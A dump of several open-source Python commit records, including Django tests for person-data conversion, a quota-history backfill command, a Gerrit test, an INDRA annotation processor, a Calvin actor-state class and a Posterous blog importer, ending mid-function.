'party_ppc_page_url': '',
}
expected_result = {
'birth_date': None,
'contact_details': [
{
'type': 'twitter',
'value': 'foobar'
}
],
'email': u'john@example.org',
'links': [
{
'note': 'wikipedia', 'url': 'http://en.wikipedia.org/wiki/John_Doe'
}
],
'name': u'John Doe',
}
self.assertEqual(
get_person_data_from_dict(form_data),
expected_result
)
def test_get_person_data_from_dict_clear_email(self):
form_data = {
'name': 'John Doe',
'email': '',
'birth_date': '',
'wikipedia_url': 'http://en.wikipedia.org/wiki/John_Doe',
'homepage_url': '',
'twitter_username': 'foobar',
'facebook_personal_url': '',
'facebook_page_url': '',
'party_ppc_page_url': '',
}
expected_result = {
'birth_date': None,
'contact_details': [
{
'type': 'twitter',
'value': 'foobar'
}
],
'links': [
{
'note': 'wikipedia', 'url': 'http://en.wikipedia.org/wiki/John_Doe'
}
],
'name': u'John Doe',
}
self.assertEqual(
get_person_data_from_dict(form_data),
expected_result
)
|
<commit_before><commit_msg>Add tests for the current behaviour of get_person_data_from_dict<commit_after>from django.test import TestCase
from candidates.models import get_person_data_from_dict
# All these are essentially tests for get_person_data_from_dict
class TestGetDataForPopIt(TestCase):
def test_get_person_data_from_dict(self):
form_data = {
'name': 'John Doe',
'email': 'john@example.org',
'birth_date': '',
'wikipedia_url': 'http://en.wikipedia.org/wiki/John_Doe',
'homepage_url': '',
'twitter_username': 'foobar',
'facebook_personal_url': '',
'facebook_page_url': '',
'party_ppc_page_url': '',
}
expected_result = {
'birth_date': None,
'contact_details': [
{
'type': 'twitter',
'value': 'foobar'
}
],
'email': u'john@example.org',
'links': [
{
'note': 'wikipedia', 'url': 'http://en.wikipedia.org/wiki/John_Doe'
}
],
'name': u'John Doe',
}
self.assertEqual(
get_person_data_from_dict(form_data),
expected_result
)
def test_get_person_data_from_dict_clear_email(self):
form_data = {
'name': 'John Doe',
'email': '',
'birth_date': '',
'wikipedia_url': 'http://en.wikipedia.org/wiki/John_Doe',
'homepage_url': '',
'twitter_username': 'foobar',
'facebook_personal_url': '',
'facebook_page_url': '',
'party_ppc_page_url': '',
}
expected_result = {
'birth_date': None,
'contact_details': [
{
'type': 'twitter',
'value': 'foobar'
}
],
'links': [
{
'note': 'wikipedia', 'url': 'http://en.wikipedia.org/wiki/John_Doe'
}
],
'name': u'John Doe',
}
self.assertEqual(
get_person_data_from_dict(form_data),
expected_result
)
|
|
1d02a8526abf8dfd9f76bbec7fac26a58ff0b25b
|
nodeconductor/quotas/management/commands/initglobalquotashistory.py
|
nodeconductor/quotas/management/commands/initglobalquotashistory.py
|
from __future__ import unicode_literals
from django.contrib.contenttypes.models import ContentType
from django.core import serializers as django_serializers
from django.core.management.base import BaseCommand
from reversion.models import Version, Revision
from nodeconductor.quotas import models
from nodeconductor.quotas.utils import get_models_with_quotas
class Command(BaseCommand):
""" Recalculate all quotas """
def handle(self, *args, **options):
for model in get_models_with_quotas():
if hasattr(model, 'GLOBAL_COUNT_QUOTA_NAME'):
quota, _ = models.Quota.objects.get_or_create(name=model.GLOBAL_COUNT_QUOTA_NAME)
for index, instance in enumerate(model.objects.all().order_by('created')):
revision = Revision.objects.create()
revision.date_created = instance.created
revision.save()
quota.usage = index + 1
serializer = django_serializers.get_serializer('json')()
serialized_data = serializer.serialize([quota])
Version.objects.create(
revision=revision,
object_id=quota.id,
object_id_int=quota.id,
content_type=ContentType.objects.get_for_model(quota),
format='json',
serialized_data=serialized_data,
object_repr=str(quota),
)
|
Implement command for quotas history population
|
Implement command for quotas history population
- itacloud-5296
|
Python
|
mit
|
opennode/nodeconductor,opennode/nodeconductor,opennode/nodeconductor
|
Implement command for quotas history population
- itacloud-5296
|
from __future__ import unicode_literals
from django.contrib.contenttypes.models import ContentType
from django.core import serializers as django_serializers
from django.core.management.base import BaseCommand
from reversion.models import Version, Revision
from nodeconductor.quotas import models
from nodeconductor.quotas.utils import get_models_with_quotas
class Command(BaseCommand):
""" Recalculate all quotas """
def handle(self, *args, **options):
for model in get_models_with_quotas():
if hasattr(model, 'GLOBAL_COUNT_QUOTA_NAME'):
quota, _ = models.Quota.objects.get_or_create(name=model.GLOBAL_COUNT_QUOTA_NAME)
for index, instance in enumerate(model.objects.all().order_by('created')):
revision = Revision.objects.create()
revision.date_created = instance.created
revision.save()
quota.usage = index + 1
serializer = django_serializers.get_serializer('json')()
serialized_data = serializer.serialize([quota])
Version.objects.create(
revision=revision,
object_id=quota.id,
object_id_int=quota.id,
content_type=ContentType.objects.get_for_model(quota),
format='json',
serialized_data=serialized_data,
object_repr=str(quota),
)
|
<commit_before><commit_msg>Implement command for quotas history population
- itacloud-5296<commit_after>
|
from __future__ import unicode_literals
from django.contrib.contenttypes.models import ContentType
from django.core import serializers as django_serializers
from django.core.management.base import BaseCommand
from reversion.models import Version, Revision
from nodeconductor.quotas import models
from nodeconductor.quotas.utils import get_models_with_quotas
class Command(BaseCommand):
""" Recalculate all quotas """
def handle(self, *args, **options):
for model in get_models_with_quotas():
if hasattr(model, 'GLOBAL_COUNT_QUOTA_NAME'):
quota, _ = models.Quota.objects.get_or_create(name=model.GLOBAL_COUNT_QUOTA_NAME)
for index, instance in enumerate(model.objects.all().order_by('created')):
revision = Revision.objects.create()
revision.date_created = instance.created
revision.save()
quota.usage = index + 1
serializer = django_serializers.get_serializer('json')()
serialized_data = serializer.serialize([quota])
Version.objects.create(
revision=revision,
object_id=quota.id,
object_id_int=quota.id,
content_type=ContentType.objects.get_for_model(quota),
format='json',
serialized_data=serialized_data,
object_repr=str(quota),
)
|
Implement command for quotas history population
- itacloud-5296from __future__ import unicode_literals
from django.contrib.contenttypes.models import ContentType
from django.core import serializers as django_serializers
from django.core.management.base import BaseCommand
from reversion.models import Version, Revision
from nodeconductor.quotas import models
from nodeconductor.quotas.utils import get_models_with_quotas
class Command(BaseCommand):
""" Recalculate all quotas """
def handle(self, *args, **options):
for model in get_models_with_quotas():
if hasattr(model, 'GLOBAL_COUNT_QUOTA_NAME'):
quota, _ = models.Quota.objects.get_or_create(name=model.GLOBAL_COUNT_QUOTA_NAME)
for index, instance in enumerate(model.objects.all().order_by('created')):
revision = Revision.objects.create()
revision.date_created = instance.created
revision.save()
quota.usage = index + 1
serializer = django_serializers.get_serializer('json')()
serialized_data = serializer.serialize([quota])
Version.objects.create(
revision=revision,
object_id=quota.id,
object_id_int=quota.id,
content_type=ContentType.objects.get_for_model(quota),
format='json',
serialized_data=serialized_data,
object_repr=str(quota),
)
|
<commit_before><commit_msg>Implement command for quotas history population
- itacloud-5296<commit_after>from __future__ import unicode_literals
from django.contrib.contenttypes.models import ContentType
from django.core import serializers as django_serializers
from django.core.management.base import BaseCommand
from reversion.models import Version, Revision
from nodeconductor.quotas import models
from nodeconductor.quotas.utils import get_models_with_quotas
class Command(BaseCommand):
""" Recalculate all quotas """
def handle(self, *args, **options):
for model in get_models_with_quotas():
if hasattr(model, 'GLOBAL_COUNT_QUOTA_NAME'):
quota, _ = models.Quota.objects.get_or_create(name=model.GLOBAL_COUNT_QUOTA_NAME)
for index, instance in enumerate(model.objects.all().order_by('created')):
revision = Revision.objects.create()
revision.date_created = instance.created
revision.save()
quota.usage = index + 1
serializer = django_serializers.get_serializer('json')()
serialized_data = serializer.serialize([quota])
Version.objects.create(
revision=revision,
object_id=quota.id,
object_id_int=quota.id,
content_type=ContentType.objects.get_for_model(quota),
format='json',
serialized_data=serialized_data,
object_repr=str(quota),
)
|
|
44f0ea9879ec05c7dca7f345d17ade07593f706b
|
tests/test_gerrit.py
|
tests/test_gerrit.py
|
import unittest
from pprint import pprint
from openstack_gerrit.collector import main
class GerritIntegrationTestCase(unittest.TestCase):
def test_query_change(self):
gs = main.GerritSession()
change = gs.query_change('423782')
# check if we have some expected keys
self.assertIn('project', change)
self.assertIn('status', change)
self.assertIn('subject', change)
|
Add quick tests for GerritSession
|
Add quick tests for GerritSession
|
Python
|
apache-2.0
|
marshallford/ndsu-ibm-capstone,marshallford/ndsu-ibm-capstone
|
Add quick tests for GerritSession
|
import unittest
from pprint import pprint
from openstack_gerrit.collector import main
class GerritIntegrationTestCase(unittest.TestCase):
def test_query_change(self):
gs = main.GerritSession()
change = gs.query_change('423782')
# check if we have some expected keys
self.assertIn('project', change)
self.assertIn('status', change)
self.assertIn('subject', change)
|
<commit_before><commit_msg>Add quick tests for GerritSession<commit_after>
|
import unittest
from pprint import pprint
from openstack_gerrit.collector import main
class GerritIntegrationTestCase(unittest.TestCase):
def test_query_change(self):
gs = main.GerritSession()
change = gs.query_change('423782')
# check if we have some expected keys
self.assertIn('project', change)
self.assertIn('status', change)
self.assertIn('subject', change)
|
Add quick tests for GerritSessionimport unittest
from pprint import pprint
from openstack_gerrit.collector import main
class GerritIntegrationTestCase(unittest.TestCase):
def test_query_change(self):
gs = main.GerritSession()
change = gs.query_change('423782')
# check if we have some expected keys
self.assertIn('project', change)
self.assertIn('status', change)
self.assertIn('subject', change)
|
<commit_before><commit_msg>Add quick tests for GerritSession<commit_after>import unittest
from pprint import pprint
from openstack_gerrit.collector import main
class GerritIntegrationTestCase(unittest.TestCase):
def test_query_change(self):
gs = main.GerritSession()
change = gs.query_change('423782')
# check if we have some expected keys
self.assertIn('project', change)
self.assertIn('status', change)
self.assertIn('subject', change)
|
|
8d906e55da3f87206b3ba6b2cea4cc1cf97a7321
|
indra/sources/hypothesis/processor.py
|
indra/sources/hypothesis/processor.py
|
import re
from indra.statements import BioContext, RefContext
from indra.preassembler.grounding_mapper.standardize import \
standardize_db_refs, name_from_grounding
class HypothesisProcessor:
def __init__(self, annotations, reader=None, grounder=None):
self.annotations = annotations
self.statements = []
if reader is None:
from indra.sources import reach
self.reader = reach.process_text
if grounder is None:
from gilda import ground
self.grounder = ground
def extract_statements(self):
for annotation in self.annotations:
stmts = self.stmts_from_annotation(annotation)
if stmt:
self.statements.append(stmt)
def stmts_from_annotation(self, annotation):
text = annotation.get('text')
if not text:
return []
parts = [t for t in text.split('\n') if t]
rp = self.reader(parts[0])
for part in parts[1:]:
match = re.match(r'Context: (.*)', part)
if not match:
continue
context_txt = match.groups()[0]
terms = self.grounder(context_txt)
db_refs = standardize_db_refs({terms[0].db: terms[0].id}) \
if terms else {}
db_refs['TEXT'] = context_txt
standard_name = name_from_grounding(terms[0].db, terms[0].id)
name = standard_name if standard_name else context_txt
# TODO: how can we tell what kind of BioContext this is exactly?
# Disease, organ, cell type, etc?
context = RefContext(name=name, db_refs=db_refs)
for stmt in rp.statements:
stmt.evidence[0].annotations.extend(annotation)
|
Add initial Statement and context extraction
|
Add initial Statement and context extraction
|
Python
|
bsd-2-clause
|
johnbachman/indra,johnbachman/belpy,bgyori/indra,johnbachman/indra,sorgerlab/belpy,sorgerlab/indra,johnbachman/belpy,bgyori/indra,sorgerlab/indra,johnbachman/belpy,sorgerlab/belpy,sorgerlab/indra,johnbachman/indra,sorgerlab/belpy,bgyori/indra
|
Add initial Statement and context extraction
|
import re
from indra.statements import BioContext, RefContext
from indra.preassembler.grounding_mapper.standardize import \
standardize_db_refs, name_from_grounding
class HypothesisProcessor:
def __init__(self, annotations, reader=None, grounder=None):
self.annotations = annotations
self.statements = []
if reader is None:
from indra.sources import reach
self.reader = reach.process_text
if grounder is None:
from gilda import ground
self.grounder = ground
def extract_statements(self):
for annotation in self.annotations:
stmts = self.stmts_from_annotation(annotation)
if stmt:
self.statements.append(stmt)
def stmts_from_annotation(self, annotation):
text = annotation.get('text')
if not text:
return []
parts = [t for t in text.split('\n') if t]
rp = self.reader(parts[0])
for part in parts[1:]:
match = re.match(r'Context: (.*)', part)
if not match:
continue
context_txt = match.groups()[0]
terms = self.grounder(context_txt)
db_refs = standardize_db_refs({terms[0].db: terms[0].id}) \
if terms else {}
db_refs['TEXT'] = context_txt
standard_name = name_from_grounding(terms[0].db, terms[0].id)
name = standard_name if standard_name else context_txt
# TODO: how can we tell what kind of BioContext this is exactly?
# Disease, organ, cell type, etc?
context = RefContext(name=name, db_refs=db_refs)
for stmt in rp.statements:
stmt.evidence[0].annotations.extend(annotation)
|
<commit_before><commit_msg>Add initial Statement and context extraction<commit_after>
|
import re
from indra.statements import BioContext, RefContext
from indra.preassembler.grounding_mapper.standardize import \
standardize_db_refs, name_from_grounding
class HypothesisProcessor:
def __init__(self, annotations, reader=None, grounder=None):
self.annotations = annotations
self.statements = []
if reader is None:
from indra.sources import reach
self.reader = reach.process_text
if grounder is None:
from gilda import ground
self.grounder = ground
def extract_statements(self):
for annotation in self.annotations:
stmts = self.stmts_from_annotation(annotation)
if stmt:
self.statements.append(stmt)
def stmts_from_annotation(self, annotation):
text = annotation.get('text')
if not text:
return []
parts = [t for t in text.split('\n') if t]
rp = self.reader(parts[0])
for part in parts[1:]:
match = re.match(r'Context: (.*)', part)
if not match:
continue
context_txt = match.groups()[0]
terms = self.grounder(context_txt)
db_refs = standardize_db_refs({terms[0].db: terms[0].id}) \
if terms else {}
db_refs['TEXT'] = context_txt
standard_name = name_from_grounding(terms[0].db, terms[0].id)
name = standard_name if standard_name else context_txt
# TODO: how can we tell what kind of BioContext this is exactly?
# Disease, organ, cell type, etc?
context = RefContext(name=name, db_refs=db_refs)
for stmt in rp.statements:
stmt.evidence[0].annotations.extend(annotation)
|
Add initial Statement and context extractionimport re
from indra.statements import BioContext, RefContext
from indra.preassembler.grounding_mapper.standardize import \
standardize_db_refs, name_from_grounding
class HypothesisProcessor:
def __init__(self, annotations, reader=None, grounder=None):
self.annotations = annotations
self.statements = []
if reader is None:
from indra.sources import reach
self.reader = reach.process_text
if grounder is None:
from gilda import ground
self.grounder = ground
def extract_statements(self):
for annotation in self.annotations:
stmts = self.stmts_from_annotation(annotation)
if stmt:
self.statements.append(stmt)
def stmts_from_annotation(self, annotation):
text = annotation.get('text')
if not text:
return []
parts = [t for t in text.split('\n') if t]
rp = self.reader(parts[0])
for part in parts[1:]:
match = re.match(r'Context: (.*)', part)
if not match:
continue
context_txt = match.groups()[0]
terms = self.grounder(context_txt)
db_refs = standardize_db_refs({terms[0].db: terms[0].id}) \
if terms else {}
db_refs['TEXT'] = context_txt
standard_name = name_from_grounding(terms[0].db, terms[0].id)
name = standard_name if standard_name else context_txt
# TODO: how can we tell what kind of BioContext this is exactly?
# Disease, organ, cell type, etc?
context = RefContext(name=name, db_refs=db_refs)
for stmt in rp.statements:
stmt.evidence[0].annotations.extend(annotation)
|
<commit_before><commit_msg>Add initial Statement and context extraction<commit_after>import re
from indra.statements import BioContext, RefContext
from indra.preassembler.grounding_mapper.standardize import \
standardize_db_refs, name_from_grounding
class HypothesisProcessor:
def __init__(self, annotations, reader=None, grounder=None):
self.annotations = annotations
self.statements = []
if reader is None:
from indra.sources import reach
self.reader = reach.process_text
if grounder is None:
from gilda import ground
self.grounder = ground
def extract_statements(self):
for annotation in self.annotations:
stmts = self.stmts_from_annotation(annotation)
if stmt:
self.statements.append(stmt)
def stmts_from_annotation(self, annotation):
text = annotation.get('text')
if not text:
return []
parts = [t for t in text.split('\n') if t]
rp = self.reader(parts[0])
for part in parts[1:]:
match = re.match(r'Context: (.*)', part)
if not match:
continue
context_txt = match.groups()[0]
terms = self.grounder(context_txt)
db_refs = standardize_db_refs({terms[0].db: terms[0].id}) \
if terms else {}
db_refs['TEXT'] = context_txt
standard_name = name_from_grounding(terms[0].db, terms[0].id)
name = standard_name if standard_name else context_txt
# TODO: how can we tell what kind of BioContext this is exactly?
# Disease, organ, cell type, etc?
context = RefContext(name=name, db_refs=db_refs)
for stmt in rp.statements:
stmt.evidence[0].annotations.extend(annotation)
|
|
b073e1294837b9776ea25d46c908b148ab404f21
|
calvin/actor/actorstate.py
|
calvin/actor/actorstate.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2016 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class ActorState(object):
"""
Class to let actors manipulate actor state variables before
a replication. Exposes managed attributes and 'replication_count'
as attributes of the object.
"""
def __init__(self, state, replication_data):
super(ActorState, self).__init__()
self.state = state
self.replication_data = replication_data
def __getattr__(self, name):
if name[0] != "_" and name in self.state['_managed']:
return self.state[name]
elif name == "replication_count":
return self.replication_data.counter
else:
raise AttributeError("ActorState does not have access to %s" % name)
def __setattr__(self, name, value):
if name == "state" or name == "replication_data":
self.__dict__[name] = value
elif name[0] != "_" and name in self.state['_managed']:
self.state[name] = value
else:
self.__dict__[name] = value
|
Add missed file for actor state manipulation during replication.
|
Add missed file for actor state manipulation during replication.
|
Python
|
apache-2.0
|
EricssonResearch/calvin-base,EricssonResearch/calvin-base,EricssonResearch/calvin-base,EricssonResearch/calvin-base
|
Add missed file for actor state manipulation during replication.
|
# -*- coding: utf-8 -*-
# Copyright (c) 2016 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class ActorState(object):
"""
Class to let actors manipulate actor state variables before
a replication. Exposes managed attributes and 'replication_count'
as attributes of the object.
"""
def __init__(self, state, replication_data):
super(ActorState, self).__init__()
self.state = state
self.replication_data = replication_data
def __getattr__(self, name):
if name[0] != "_" and name in self.state['_managed']:
return self.state[name]
elif name == "replication_count":
return self.replication_data.counter
else:
raise AttributeError("ActorState does not have access to %s" % name)
def __setattr__(self, name, value):
if name == "state" or name == "replication_data":
self.__dict__[name] = value
elif name[0] != "_" and name in self.state['_managed']:
self.state[name] = value
else:
self.__dict__[name] = value
|
<commit_before><commit_msg>Add missed file for actor state manipulation during replication.<commit_after>
|
# -*- coding: utf-8 -*-
# Copyright (c) 2016 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class ActorState(object):
"""
Class to let actors manipulate actor state variables before
a replication. Exposes managed attributes and 'replication_count'
as attributes of the object.
"""
def __init__(self, state, replication_data):
super(ActorState, self).__init__()
self.state = state
self.replication_data = replication_data
def __getattr__(self, name):
if name[0] != "_" and name in self.state['_managed']:
return self.state[name]
elif name == "replication_count":
return self.replication_data.counter
else:
raise AttributeError("ActorState does not have access to %s" % name)
def __setattr__(self, name, value):
if name == "state" or name == "replication_data":
self.__dict__[name] = value
elif name[0] != "_" and name in self.state['_managed']:
self.state[name] = value
else:
self.__dict__[name] = value
|
Add missed file for actor state manipulation during replication.
# -*- coding: utf-8 -*-
# Copyright (c) 2016 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class ActorState(object):
"""
Class to let actors manipulate actor state variables before
a replication. Exposes managed attributes and 'replication_count'
as attributes of the object.
"""
def __init__(self, state, replication_data):
super(ActorState, self).__init__()
self.state = state
self.replication_data = replication_data
def __getattr__(self, name):
if name[0] != "_" and name in self.state['_managed']:
return self.state[name]
elif name == "replication_count":
return self.replication_data.counter
else:
raise AttributeError("ActorState does not have access to %s" % name)
def __setattr__(self, name, value):
if name == "state" or name == "replication_data":
self.__dict__[name] = value
elif name[0] != "_" and name in self.state['_managed']:
self.state[name] = value
else:
self.__dict__[name] = value
|
<commit_before><commit_msg>Add missed file for actor state manipulation during replication.<commit_after>
# -*- coding: utf-8 -*-
# Copyright (c) 2016 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class ActorState(object):
"""
Class to let actors manipulate actor state variables before
a replication. Exposes managed attributes and 'replication_count'
as attributes of the object.
"""
def __init__(self, state, replication_data):
super(ActorState, self).__init__()
self.state = state
self.replication_data = replication_data
def __getattr__(self, name):
if name[0] != "_" and name in self.state['_managed']:
return self.state[name]
elif name == "replication_count":
return self.replication_data.counter
else:
raise AttributeError("ActorState does not have access to %s" % name)
def __setattr__(self, name, value):
if name == "state" or name == "replication_data":
self.__dict__[name] = value
elif name[0] != "_" and name in self.state['_managed']:
self.state[name] = value
else:
self.__dict__[name] = value
|
|
56d9482598d14b243f7e8d1cf0e167969e8fac4e
|
mezzanine/blog/management/commands/import_posterous.py
|
mezzanine/blog/management/commands/import_posterous.py
|
from mezzanine.blog.management.base import BaseImporterCommand
from optparse import make_option
from urllib import urlopen, urlencode
import requests
import json
import time
from datetime import datetime
import sys
# import requests_cache
# requests_cache.configure('demo_cache')
class PosterousImportException(Exception):
pass
class Command(BaseImporterCommand):
"""
Import Tumblr blog posts into the blog app.
"""
option_list = BaseImporterCommand.option_list + (
make_option("-a", "--api-token", dest="api_token",
help="Posterous API Key"),
make_option("-u", "--username", dest="username",
help="Posterous Username"),
make_option("-p", "--password", dest="password",
help="Posterous Password"),
make_option("-d", "--hostname", dest="hostname",
help="Posterous Blog Hostname")
)
help = "Import Posterous blog posts into the blog app."
def request(self, path, data=None):
my_config = {'verbose': sys.stderr}
data = data or {}
params = {
'api_token': self.api_token
}
params.update(data)
url = "http://posterous.com/api/2/%s" % path
r = requests.get(url, data=params, auth=(self.username, self.password), config=my_config)
if r.text.startswith("403"):
raise PosterousImportException(r.text)
try:
response = json.loads(r.text)
return response
except:
raise PosterousImportException(r.text)
def handle_import(self, options):
self.api_token = options.get("api_token")
self.username = options.get("username")
self.password = options.get("password")
hostname = options.get("hostname")
sites = self.request('sites')
for site in sites:
if site['full_hostname'] == hostname:
time.sleep(2)
break
path ='sites/%s/posts' % site['id']
page = 1
while True:
posts = self.request(path, data={'page': page})
print len(posts)
if not posts:
break
for post in posts:
# import pprint
# print pprint.pprint(post)
content = post['body_full']
title = post['title']
old_url = post['full_url']
tags = [t['name'] for t in post['tags']]
pub_date = datetime.strptime(post['display_date'][:-6], "%Y/%m/%d %H:%M:%S")
self.add_post(
title=title,
content=content,
pub_date=pub_date,
tags=tags,
old_url=old_url
)
page += 1
time.sleep(2)
|
Add initial support for importing blog posts from posterous.
|
Add initial support for importing blog posts from posterous.
|
Python
|
bsd-2-clause
|
sjdines/mezzanine,dsanders11/mezzanine,readevalprint/mezzanine,damnfine/mezzanine,Skytorn86/mezzanine,sjdines/mezzanine,cccs-web/mezzanine,industrydive/mezzanine,biomassives/mezzanine,dovydas/mezzanine,damnfine/mezzanine,viaregio/mezzanine,wyzex/mezzanine,sjuxax/mezzanine,orlenko/sfpirg,guibernardino/mezzanine,Cajoline/mezzanine,gbosh/mezzanine,fusionbox/mezzanine,dekomote/mezzanine-modeltranslation-backport,wyzex/mezzanine,tuxinhang1989/mezzanine,webounty/mezzanine,frankier/mezzanine,ZeroXn/mezzanine,douglaskastle/mezzanine,ryneeverett/mezzanine,joshcartme/mezzanine,vladir/mezzanine,biomassives/mezzanine,sjdines/mezzanine,stephenmcd/mezzanine,nikolas/mezzanine,Cicero-Zhao/mezzanine,dustinrb/mezzanine,jjz/mezzanine,promil23/mezzanine,readevalprint/mezzanine,dekomote/mezzanine-modeltranslation-backport,ZeroXn/mezzanine,agepoly/mezzanine,agepoly/mezzanine,mush42/mezzanine,emile2016/mezzanine,adrian-the-git/mezzanine,eino-makitalo/mezzanine,SoLoHiC/mezzanine,theclanks/mezzanine,vladir/mezzanine,orlenko/sfpirg,viaregio/mezzanine,molokov/mezzanine,ryneeverett/mezzanine,dustinrb/mezzanine,scarcry/snm-mezzanine,SoLoHiC/mezzanine,orlenko/plei,frankchin/mezzanine,industrydive/mezzanine,scarcry/snm-mezzanine,stephenmcd/mezzanine,Cajoline/mezzanine,emile2016/mezzanine,PegasusWang/mezzanine,sjuxax/mezzanine,wrwrwr/mezzanine,jerivas/mezzanine,jerivas/mezzanine,jjz/mezzanine,wbtuomela/mezzanine,PegasusWang/mezzanine,SoLoHiC/mezzanine,orlenko/plei,dustinrb/mezzanine,geodesign/mezzanine,molokov/mezzanine,vladir/mezzanine,dovydas/mezzanine,christianwgd/mezzanine,frankier/mezzanine,frankchin/mezzanine,tuxinhang1989/mezzanine,gradel/mezzanine,industrydive/mezzanine,stbarnabas/mezzanine,Kniyl/mezzanine,douglaskastle/mezzanine,stbarnabas/mezzanine,damnfine/mezzanine,agepoly/mezzanine,saintbird/mezzanine,stephenmcd/mezzanine,batpad/mezzanine,christianwgd/mezzanine,jjz/mezzanine,AlexHill/mezzanine,nikolas/mezzanine,geodesign/mezzanine,wbtuomela/mezzanine,emile2016/mezzanine,gradel/mezzanine,Kniyl/mezzanine,christianwgd/mezzanine,saintbird/mezzanine,frankier/mezzanine,theclanks/mezzanine,Skytorn86/mezzanine,dovydas/mezzanine,wbtuomela/mezzanine,fusionbox/mezzanine,douglaskastle/mezzanine,promil23/mezzanine,Skytorn86/mezzanine,Cicero-Zhao/mezzanine,dekomote/mezzanine-modeltranslation-backport,dsanders11/mezzanine,webounty/mezzanine,eino-makitalo/mezzanine,spookylukey/mezzanine,jerivas/mezzanine,gradel/mezzanine,ZeroXn/mezzanine,adrian-the-git/mezzanine,PegasusWang/mezzanine,cccs-web/mezzanine,readevalprint/mezzanine,orlenko/sfpirg,viaregio/mezzanine,gbosh/mezzanine,scarcry/snm-mezzanine,eino-makitalo/mezzanine,guibernardino/mezzanine,spookylukey/mezzanine,webounty/mezzanine,promil23/mezzanine,wyzex/mezzanine,Kniyl/mezzanine,mush42/mezzanine,Cajoline/mezzanine,wrwrwr/mezzanine,sjuxax/mezzanine,orlenko/plei,biomassives/mezzanine,spookylukey/mezzanine,geodesign/mezzanine,saintbird/mezzanine,mush42/mezzanine,batpad/mezzanine,adrian-the-git/mezzanine,molokov/mezzanine,theclanks/mezzanine,dsanders11/mezzanine,tuxinhang1989/mezzanine,ryneeverett/mezzanine,nikolas/mezzanine,AlexHill/mezzanine,joshcartme/mezzanine,gbosh/mezzanine,frankchin/mezzanine,joshcartme/mezzanine
|
Add initial support for importing blog posts from posterous.
|
from mezzanine.blog.management.base import BaseImporterCommand
from optparse import make_option
from urllib import urlopen, urlencode
import requests
import json
import time
from datetime import datetime
import sys
# import requests_cache
# requests_cache.configure('demo_cache')
class PosterousImportException(Exception):
pass
class Command(BaseImporterCommand):
"""
Import Tumblr blog posts into the blog app.
"""
option_list = BaseImporterCommand.option_list + (
make_option("-a", "--api-token", dest="api_token",
help="Posterous API Key"),
make_option("-u", "--username", dest="username",
help="Posterous Username"),
make_option("-p", "--password", dest="password",
help="Posterous Password"),
make_option("-d", "--hostname", dest="hostname",
help="Posterous Blog Hostname")
)
help = "Import Posterous blog posts into the blog app."
def request(self, path, data=None):
my_config = {'verbose': sys.stderr}
data = data or {}
params = {
'api_token': self.api_token
}
params.update(data)
url = "http://posterous.com/api/2/%s" % path
r = requests.get(url, data=params, auth=(self.username, self.password), config=my_config)
if r.text.startswith("403"):
raise PosterousImportException(r.text)
try:
response = json.loads(r.text)
return response
except:
raise PosterousImportException(r.text)
def handle_import(self, options):
self.api_token = options.get("api_token")
self.username = options.get("username")
self.password = options.get("password")
hostname = options.get("hostname")
sites = self.request('sites')
for site in sites:
if site['full_hostname'] == hostname:
time.sleep(2)
break
path ='sites/%s/posts' % site['id']
page = 1
while True:
posts = self.request(path, data={'page': page})
print len(posts)
if not posts:
break
for post in posts:
# import pprint
# print pprint.pprint(post)
content = post['body_full']
title = post['title']
old_url = post['full_url']
tags = [t['name'] for t in post['tags']]
pub_date = datetime.strptime(post['display_date'][:-6], "%Y/%m/%d %H:%M:%S")
self.add_post(
title=title,
content=content,
pub_date=pub_date,
tags=tags,
old_url=old_url
)
page += 1
time.sleep(2)
|
<commit_before><commit_msg>Add initial support for importing blog posts from posterous.<commit_after>
|
from mezzanine.blog.management.base import BaseImporterCommand
from optparse import make_option
from urllib import urlopen, urlencode
import requests
import json
import time
from datetime import datetime
import sys
# import requests_cache
# requests_cache.configure('demo_cache')
class PosterousImportException(Exception):
pass
class Command(BaseImporterCommand):
"""
Import Tumblr blog posts into the blog app.
"""
option_list = BaseImporterCommand.option_list + (
make_option("-a", "--api-token", dest="api_token",
help="Posterous API Key"),
make_option("-u", "--username", dest="username",
help="Posterous Username"),
make_option("-p", "--password", dest="password",
help="Posterous Password"),
make_option("-d", "--hostname", dest="hostname",
help="Posterous Blog Hostname")
)
help = "Import Posterous blog posts into the blog app."
def request(self, path, data=None):
my_config = {'verbose': sys.stderr}
data = data or {}
params = {
'api_token': self.api_token
}
params.update(data)
url = "http://posterous.com/api/2/%s" % path
r = requests.get(url, data=params, auth=(self.username, self.password), config=my_config)
if r.text.startswith("403"):
raise PosterousImportException(r.text)
try:
response = json.loads(r.text)
return response
except:
